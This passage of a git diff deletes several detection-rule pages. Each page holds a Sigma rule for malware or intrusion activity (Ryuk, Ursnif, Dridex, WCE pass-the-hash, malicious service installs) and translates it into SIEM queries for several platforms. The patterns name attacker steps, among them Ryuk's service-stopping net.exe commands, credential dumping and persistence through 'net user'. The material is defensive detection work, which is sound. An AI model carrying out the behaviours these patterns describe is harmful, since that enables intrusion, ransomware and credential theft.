-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Octopus Scanner Malware'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"11" AND TargetFilename.keyword:(*\\AppData\\Local\\Microsoft\\Cache134.dat *\\AppData\\Local\\Microsoft\\ExplorerSync.db))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="11" (TargetFilename="*\\AppData\\Local\\Microsoft\\Cache134.dat" OR TargetFilename="*\\AppData\\Local\\Microsoft\\ExplorerSync.db"))
-```
-
-
-### logpoint
-    
-```
-(event_id="11" TargetFilename IN ["*\\AppData\\Local\\Microsoft\\Cache134.dat", "*\\AppData\\Local\\Microsoft\\ExplorerSync.db"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*11)(?=.*(?:.*.*\AppData\Local\Microsoft\Cache134\.dat|.*.*\AppData\Local\Microsoft\ExplorerSync\.db)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mal_ryuk.md b/Atomic_Threat_Coverage/Detection_Rules/win_mal_ryuk.md
deleted file mode 100644
index fd247d6..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mal_ryuk.md
+++ /dev/null
@@ -1,169 +0,0 @@
-| Title                    | Ryuk Ransomware       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Ryuk Ransomware command lines |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/](https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/)</li></ul>  |
-| **Author**               | Vasiliy Burov |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Ryuk Ransomware
-id: 0acaad27-9f02-4136-a243-c357202edd74
-description: Detects Ryuk Ransomware command lines
-status: experimental
-references:
-    - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/
-author: Vasiliy Burov
-date: 2019/08/06
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '*\net.exe stop "samss" *'
-            - '*\net.exe stop "audioendpointbuilder" *'
-            - '*\net.exe stop "unistoresvc_?????" *'
-    condition: selection
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*\\net.exe stop \"samss\" .*" -or $_.message -match "CommandLine.*.*\\net.exe stop \"audioendpointbuilder\" .*" -or $_.message -match "CommandLine.*.*\\net.exe stop \"unistoresvc_?????\" .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\\net.exe\ stop\ \"samss\"\ * OR *\\net.exe\ stop\ \"audioendpointbuilder\"\ * OR *\\net.exe\ stop\ \"unistoresvc_?????\"\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/0acaad27-9f02-4136-a243-c357202edd74 <<EOF
-{
-  "metadata": {
-    "title": "Ryuk Ransomware",
-    "description": "Detects Ryuk Ransomware command lines",
-    "tags": "",
-    "query": "winlog.event_data.CommandLine.keyword:(*\\\\net.exe\\ stop\\ \\\"samss\\\"\\ * OR *\\\\net.exe\\ stop\\ \\\"audioendpointbuilder\\\"\\ * OR *\\\\net.exe\\ stop\\ \\\"unistoresvc_?????\\\"\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\\\net.exe\\ stop\\ \\\"samss\\\"\\ * OR *\\\\net.exe\\ stop\\ \\\"audioendpointbuilder\\\"\\ * OR *\\\\net.exe\\ stop\\ \\\"unistoresvc_?????\\\"\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Ryuk Ransomware'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*\\net.exe stop \"samss\" * *\\net.exe stop \"audioendpointbuilder\" * *\\net.exe stop \"unistoresvc_?????\" *)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*\\net.exe stop \"samss\" *" OR CommandLine="*\\net.exe stop \"audioendpointbuilder\" *" OR CommandLine="*\\net.exe stop \"unistoresvc_?????\" *")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*\\net.exe stop \"samss\" *", "*\\net.exe stop \"audioendpointbuilder\" *", "*\\net.exe stop \"unistoresvc_?????\" *"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\net\.exe stop "samss" .*|.*.*\net\.exe stop "audioendpointbuilder" .*|.*.*\net\.exe stop "unistoresvc_?????" .*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mal_service_installs.md b/Atomic_Threat_Coverage/Detection_Rules/win_mal_service_installs.md
deleted file mode 100644
index 487a780..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mal_service_installs.md
+++ /dev/null
@@ -1,188 +0,0 @@
-| Title                    | Malicious Service Installations       |
-|:-------------------------|:------------------|
-| **Description**          | Detects known malicious service installs that only appear in cases of lateral movement, credential dumping and other suspicious activity |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li><li>[T1035: Service Execution](https://attack.mitre.org/techniques/T1035)</li><li>[T1050: New Service](https://attack.mitre.org/techniques/T1050)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Penetration testing</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth, Daniil Yugoslavskiy, oscd.community (update) |
-| Other Tags           | <ul><li>car.2013-09-005</li><li>attack.t1543.003</li><li>attack.t1569.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Malicious Service Installations
-id: 5a105d34-05fc-401e-8553-272b45c1522d
-description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping and other suspicious activity
-author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update)
-date: 2017/03/27
-modified: 2019/11/01
-tags:
-    - attack.persistence
-    - attack.privilege_escalation
-    - attack.t1003
-    - attack.t1035
-    - attack.t1050
-    - car.2013-09-005
-    - attack.t1543.003
-    - attack.t1569.002
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 7045
-    malsvc_paexec:
-        ServiceFileName|contains: '\PAExec'
-    malsvc_wannacry:
-        ServiceName: 'mssecsvc2.0'
-    malsvc_persistence:
-        ServiceFileName|contains: 'net user'
-    condition: selection and 1 of malsvc_*
-falsepositives:
-    - Penetration testing
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "7045" -and ($_.message -match "ServiceFileName.*.*\\PAExec.*" -or $_.message -match "ServiceName.*mssecsvc2.0" -or $_.message -match "ServiceFileName.*.*net user.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"7045" AND (winlog.event_data.ServiceFileName.keyword:*\\PAExec* OR winlog.event_data.ServiceName:"mssecsvc2.0" OR winlog.event_data.ServiceFileName.keyword:*net\ user*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/5a105d34-05fc-401e-8553-272b45c1522d <<EOF
-{
-  "metadata": {
-    "title": "Malicious Service Installations",
-    "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping and other suspicious activity",
-    "tags": [
-      "attack.persistence",
-      "attack.privilege_escalation",
-      "attack.t1003",
-      "attack.t1035",
-      "attack.t1050",
-      "car.2013-09-005",
-      "attack.t1543.003",
-      "attack.t1569.002"
-    ],
-    "query": "(winlog.event_id:\"7045\" AND (winlog.event_data.ServiceFileName.keyword:*\\\\PAExec* OR winlog.event_data.ServiceName:\"mssecsvc2.0\" OR winlog.event_data.ServiceFileName.keyword:*net\\ user*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"7045\" AND (winlog.event_data.ServiceFileName.keyword:*\\\\PAExec* OR winlog.event_data.ServiceName:\"mssecsvc2.0\" OR winlog.event_data.ServiceFileName.keyword:*net\\ user*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Malicious Service Installations'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"7045" AND (ServiceFileName.keyword:*\\PAExec* OR ServiceName:"mssecsvc2.0" OR ServiceFileName.keyword:*net user*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="7045" (ServiceFileName="*\\PAExec*" OR ServiceName="mssecsvc2.0" OR ServiceFileName="*net user*"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="7045" (ServiceFileName="*\\PAExec*" OR service="mssecsvc2.0" OR ServiceFileName="*net user*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*7045)(?=.*(?:.*(?:.*.*\PAExec.*|.*mssecsvc2\.0|.*.*net user.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mal_ursnif.md b/Atomic_Threat_Coverage/Detection_Rules/win_mal_ursnif.md
deleted file mode 100644
index 36bb294..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mal_ursnif.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Ursnif       |
-|:-------------------------|:------------------|
-| **Description**          | Detects new registry key created by Ursnif malware. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1112: Modify Registry](https://attack.mitre.org/techniques/T1112)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1112: Modify Registry](../Triggers/T1112.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://blog.yoroi.company/research/ursnif-long-live-the-steganography/](https://blog.yoroi.company/research/ursnif-long-live-the-steganography/)</li><li>[https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/](https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/)</li></ul>  |
-| **Author**               | megan201296 |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Ursnif
-id: 21f17060-b282-4249-ade0-589ea3591558
-status: experimental
-description: Detects new registry key created by Ursnif malware.
-references:
-    - https://blog.yoroi.company/research/ursnif-long-live-the-steganography/
-    - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
-tags:
-    - attack.execution
-    - attack.t1112
-author: megan201296
-date: 2019/02/13
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 13
-        TargetObject: '*\Software\AppDataLow\Software\Microsoft\\*'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "13" -and $_.message -match "TargetObject.*.*\\Software\\AppDataLow\\Software\\Microsoft\\.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"13" AND winlog.event_data.TargetObject.keyword:*\\Software\\AppDataLow\\Software\\Microsoft\\*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/21f17060-b282-4249-ade0-589ea3591558 <<EOF
-{
-  "metadata": {
-    "title": "Ursnif",
-    "description": "Detects new registry key created by Ursnif malware.",
-    "tags": [
-      "attack.execution",
-      "attack.t1112"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"13\" AND winlog.event_data.TargetObject.keyword:*\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"13\" AND winlog.event_data.TargetObject.keyword:*\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Ursnif'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"13" AND TargetObject.keyword:*\\Software\\AppDataLow\\Software\\Microsoft\\*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="13" TargetObject="*\\Software\\AppDataLow\\Software\\Microsoft\\*")
-```
-
-
-### logpoint
-    
-```
-(event_id="13" TargetObject="*\\Software\\AppDataLow\\Software\\Microsoft\\*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*13)(?=.*.*\Software\AppDataLow\Software\Microsoft\\.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_mal_wceaux_dll.md b/Atomic_Threat_Coverage/Detection_Rules/win_mal_wceaux_dll.md
deleted file mode 100644
index ade2ab1..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_mal_wceaux_dll.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | WCE wceaux.dll Access       |
-|:-------------------------|:------------------|
-| **Description**          | Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Penetration testing</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.jpcert.or.jp/english/pub/sr/ir_research.html](https://www.jpcert.or.jp/english/pub/sr/ir_research.html)</li><li>[https://jpcertcc.github.io/ToolAnalysisResultSheet](https://jpcertcc.github.io/ToolAnalysisResultSheet)</li></ul>  |
-| **Author**               | Thomas Patzke |
-| Other Tags           | <ul><li>attack.s0005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: WCE wceaux.dll Access
-id: 1de68c67-af5c-4097-9c85-fe5578e09e67
-status: experimental
-description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
-author: Thomas Patzke
-date: 2017/06/14
-references:
-    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
-    - https://jpcertcc.github.io/ToolAnalysisResultSheet
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.s0005
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID:
-            - 4656
-            - 4658
-            - 4660
-            - 4663
-        ObjectName: '*\wceaux.dll'
-    condition: selection
-falsepositives:
-    - Penetration testing
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "4656" -or $_.ID -eq "4658" -or $_.ID -eq "4660" -or $_.ID -eq "4663") -and $_.message -match "ObjectName.*.*\\wceaux.dll") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:("4656" OR "4658" OR "4660" OR "4663") AND winlog.event_data.ObjectName.keyword:*\\wceaux.dll)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1de68c67-af5c-4097-9c85-fe5578e09e67 <<EOF
-{
-  "metadata": {
-    "title": "WCE wceaux.dll Access",
-    "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.s0005"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"4656\" OR \"4658\" OR \"4660\" OR \"4663\") AND winlog.event_data.ObjectName.keyword:*\\\\wceaux.dll)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"4656\" OR \"4658\" OR \"4660\" OR \"4663\") AND winlog.event_data.ObjectName.keyword:*\\\\wceaux.dll)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'WCE wceaux.dll Access'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("4656" "4658" "4660" "4663") AND ObjectName.keyword:*\\wceaux.dll)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="4656" OR EventCode="4658" OR EventCode="4660" OR EventCode="4663") ObjectName="*\\wceaux.dll")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id IN ["4656", "4658", "4660", "4663"] ObjectName="*\\wceaux.dll")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*4656|.*4658|.*4660|.*4663))(?=.*.*\wceaux\.dll))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_dridex.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_dridex.md
deleted file mode 100644
index 883a55b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_dridex.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Dridex Process Pattern       |
-|:-------------------------|:------------------|
-| **Description**          | Detects typical Dridex process patterns |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1055: Process Injection](https://attack.mitre.org/techniques/T1055)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1055: Process Injection](../Triggers/T1055.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3](https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Dridex Process Pattern
-id: e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e
-status: experimental
-description: Detects typical Dridex process patterns
-references:
-    - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3
-author: Florian Roth
-date: 2019/01/10
-tags:
-    - attack.defense_evasion
-    - attack.privilege_escalation
-    - attack.t1055
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        CommandLine: '*\svchost.exe C:\Users\\*\Desktop\\*'
-    selection2:
-        ParentImage: '*\svchost.exe*'
-        CommandLine:
-            - '*whoami.exe /all'
-            - '*net.exe view'
-    condition: 1 of them
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and ($_.message -match "CommandLine.*.*\\svchost.exe C:\\Users\\.*\\Desktop\\.*" -or ($_.message -match "ParentImage.*.*\\svchost.exe.*" -and ($_.message -match "CommandLine.*.*whoami.exe /all" -or $_.message -match "CommandLine.*.*net.exe view")))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*\\svchost.exe\ C\:\\Users\\*\\Desktop\\* OR (winlog.event_data.ParentImage.keyword:*\\svchost.exe* AND winlog.event_data.CommandLine.keyword:(*whoami.exe\ \/all OR *net.exe\ view)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e <<EOF
-{
-  "metadata": {
-    "title": "Dridex Process Pattern",
-    "description": "Detects typical Dridex process patterns",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.privilege_escalation",
-      "attack.t1055"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*\\\\svchost.exe\\ C\\:\\\\Users\\\\*\\\\Desktop\\\\* OR (winlog.event_data.ParentImage.keyword:*\\\\svchost.exe* AND winlog.event_data.CommandLine.keyword:(*whoami.exe\\ \\/all OR *net.exe\\ view)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*\\\\svchost.exe\\ C\\:\\\\Users\\\\*\\\\Desktop\\\\* OR (winlog.event_data.ParentImage.keyword:*\\\\svchost.exe* AND winlog.event_data.CommandLine.keyword:(*whoami.exe\\ \\/all OR *net.exe\\ view)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Dridex Process Pattern'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*\\svchost.exe C\:\\Users\\*\\Desktop\\* OR (ParentImage.keyword:*\\svchost.exe* AND CommandLine.keyword:(*whoami.exe \/all *net.exe view)))
-```
-
-
-### splunk
-    
-```
-(CommandLine="*\\svchost.exe C:\\Users\\*\\Desktop\\*" OR (ParentImage="*\\svchost.exe*" (CommandLine="*whoami.exe /all" OR CommandLine="*net.exe view")))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (CommandLine="*\\svchost.exe C:\\Users\\*\\Desktop\\*" OR (ParentImage="*\\svchost.exe*" CommandLine IN ["*whoami.exe /all", "*net.exe view"])))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*.*\svchost\.exe C:\Users\\.*\Desktop\\.*|.*(?:.*(?=.*.*\svchost\.exe.*)(?=.*(?:.*.*whoami\.exe /all|.*.*net\.exe view)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_malware_dtrack.md b/Atomic_Threat_Coverage/Detection_Rules/win_malware_dtrack.md
deleted file mode 100644
index 0b6a62c..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_malware_dtrack.md
+++ /dev/null
@@ -1,171 +0,0 @@
-| Title                    | DTRACK Process Creation       |
-|:-------------------------|:------------------|
-| **Description**          | Detects specific process parameters as seen in DTRACK infections |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
